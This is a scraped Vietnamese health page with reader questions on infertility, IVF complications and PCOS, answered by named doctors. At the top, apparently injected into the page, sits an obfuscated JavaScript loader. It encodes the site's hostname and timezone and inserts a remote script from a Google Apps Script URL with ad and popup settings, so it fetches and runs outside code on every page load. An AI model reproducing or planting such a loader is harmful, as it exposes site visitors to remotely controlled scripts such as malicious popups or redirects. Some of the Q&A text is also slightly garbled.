var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Cách đọc kết quả siêu âm đầu dò

Trong hơn một năm vừa qua, tôi đã kết hôn nhưng chưa có thai. Tôi đang tìm kiếm phương pháp tốt nhất và địa điểm phù hợp để khám thai.

[email protected].

Nguyên Thị Phượng.

Trả lời:.

Để tìm ra nguyên nhân vì sao vẫn chưa thụ thai, vợ chồng cháu nên đến Bệnh viện Phụ sản Trung ương để kiểm tra. Sau đó, các bác sĩ sẽ đưa ra phương pháp điều trị phù hợp dựa trên kết quả kiểm tra.

Để thuận tiện cho việc kiểm tra sức khỏe và tình trạng sinh sản của cả hai vợ chồng, cháu cần được khám bệnh vào thời điểm kinh nguyệt đã qua 2 ngày và cả hai nên kiêng giao hợp từ lúc bắt đầu kinh nguyệt cho đến ngày khám bệnh.

Tiến sĩ Lê Minh Châu.

Bộ môn Chăm sóc sức khỏe.

Tôi đã tròn 27 tuổi và kết hôn được hơn một năm rồi. Ban đầu, chúng tôi sử dụng bảo vệ bằng bao cao su, nhưng khoảng 5 tháng trở lại đây, tôi muốn có thai nhưng không thành công. Chu kỳ kinh nguyệt của tôi đều và không gặp đau bụng. Trong 6 tháng qua, chu kỳ của tôi kéo dài như sau: tháng 6 kéo dài 30 ngày, tháng 7 kéo dài 27 ngày, tháng 8 kéo dài 31 ngày, tháng 9 kéo dài 27 ngày và tháng 10 có kinh ngày 24/10. Vào ngày thứ 13 của chu kỳ kinh nguyệt này, tôi đã được siêu âm đầu tiên và kết quả như sau: – Tử cung: Ngã trước, kích thước là 27 mm – Niêm mạc: 9 mm – Buồng trứng: P: Bình thường T: có khối echo trống 19x17mm – Túi cùng: Không có dịch KL: nang cơ năng buống trứng phải. Tôi muốn hỏi liệu việc quan hệ vào ngày 14 hoặc 16 của chu kỳ này có thể giúp tôi có thai hay không, vì trong các tháng trước đó, chúng tôi đã quan hệ vào các ngày thứ 13, 14, 15 nhưng không thành công. Tôi cũng muốn biết kích thước tử cung và niêm mạc tử cung của tôi có bình thường và thuận lợi để thụ thai không. Chồng tôi và tôi đã đi khám, xét nghiệm tinh dịch, làm Pap, xét nghiệm tế bào cổ tử cung và soi huyết trắng và kết quả đều bình thường. Tôi rất mong được các bác sĩ tư vấn giúp đỡ và xin chân thành cảm ơn.

[email protected].

Anh Mai Trần.

Trả lời:.

Tương đối bình thường, chức năng sinh sản bên trong của bạn được đánh giá qua những thông tin bạn đã cung cấp. Tuy nhiên, để có thai sớm có thể phụ thuộc vào nhiều yếu tố như vòi tử cung có bị tắc, nang noãn có bị rụng hay không. Tuy nhiên, với kế hoạch 5 tháng chưa đủ thời gian để chẩn đoán vô sinh, bạn nên theo dõi thêm 3-6 chu kỳ kinh nguyệt tiếp theo (giao hợp từ ngày thứ 13 đến 16 trong chu kỳ kinh 27-30 ngày của bạn). Nếu không thụ thai được, bạn nên đến khám để được bác sỹ sản phụ khoa thực hiện các xét nghiệm và tư vấn chi tiết.

Bác sĩ Trần Thị Hường.

Bệnh viện tại số 56 Hai Bà Trưng.

Cách đọc kết quả siêu âm đầu dò

Hôm trước, em đã thử làm tinh trong ống nghiệm. Sau khi chuyển phôi được 11 ngày, em bị đau bụng và ra máu. Sau đó, sau 3 ngày, em lại bị đau bụng nặng và đã đi đến bệnh viện để kiểm tra bằng siêu âm. Sau khi kiểm tra, bác sĩ cho em biết rằng không có dịch và túi phôi trong bụng của em, và em được cho về nhà. Em đã bị ra máu trong khoảng 6 ngày, sau đó dừng lại. Tuy nhiên, sau 4 ngày, em lại bị ra máu và cảm thấy đau bụng dưới trong khoảng 3 ngày. Hiện tại, em đang rất lo lắng và mong muốn được các bác sĩ chỉ giáo về tình trạng sức khỏe của mình.

Nguyễn Thị Thúy.

Trả lời:.

Để được khám và thực hiện xét nghiệm βhCG, em phải tới Trung tâm hỗ trợ sinh sản. Trong trường hợp thụ tinh trong ống nghiệm sau đó bị chửa ngoài dạ con, βhCG tăng lên, siêu âm không phát hiện túi thai trong tử cung và bệnh nhân có các triệu chứng như đau bụng và ra huyết. Nếu βhCG của em thấp hơn 5IU/ml (không có thai), đau bụng có thể do buồng trứng sau khi chọc hút noãn vẫn còn to và có nang noãn phát triển.

Đã một năm đã trôi qua kể từ khi tôi phải chữa trị cho bệnh buồng trứng đa nang và phẫu thuật nội soi do bác sĩ Chương (tại Bệnh viện Phụ sản Trung ương) và thử phương pháp IUI trong hai chu kỳ nhưng không thành công. Chu kỳ kinh nguyệt của tôi chỉ xuất hiện khi tôi sử dụng thuốc (trước và sau khi phẫu thuật). Sau đó, tôi nghỉ ngơi một tháng và sử dụng thuốc Bắc để điều trị cho bệnh buồng trứng (tôi uống 20 phần). Trong tháng đó, tôi đã có thai thành công. Bé của tôi đã được sinh ra được 16 tháng và tôi đã ngừng cho bé bú được một tuần nhưng tôi vẫn chưa có chu kỳ kinh nguyệt. Tôi muốn hỏi bác sĩ liệu trường hợp của tôi có phải là bình thường và liệu tôi có phụ thuộc vào thuốc nội tiết không? Cảm ơn bác sĩ rất nhiều!

[email protected].

Tôi là Nguyễn Thị Thúy.

Trả lời:.

Đặc điểm của hội chứng buồng trứng đa nang là phóng noãn bị rối loạn và không đều. Để điều trị bệnh lý này, có thể sử dụng phẫu thuật nội soi để điều chỉnh và giảm lượng Androgen bằng cách đốt điểm buồng trứng và tạo điều kiện cho phóng noãn. Một số trường hợp đã có kết quả tốt với việc thụ thai từ 3 đến 6 tháng sau mổ. Nếu kinh nguyệt vẫn chưa trở lại sau khi sinh và cho con bú, cần khám để xác định tình trạng bệnh lý của hội chứng buồng trứng đa nang. Cũng có nhiều trường hợp người phụ nữ không biết mình đang mang thai trong thời gian cho con bú.

Tiến sĩ Nguyễn Xuân Hợi.

Trung tâm Hỗ trợ Sinh sản.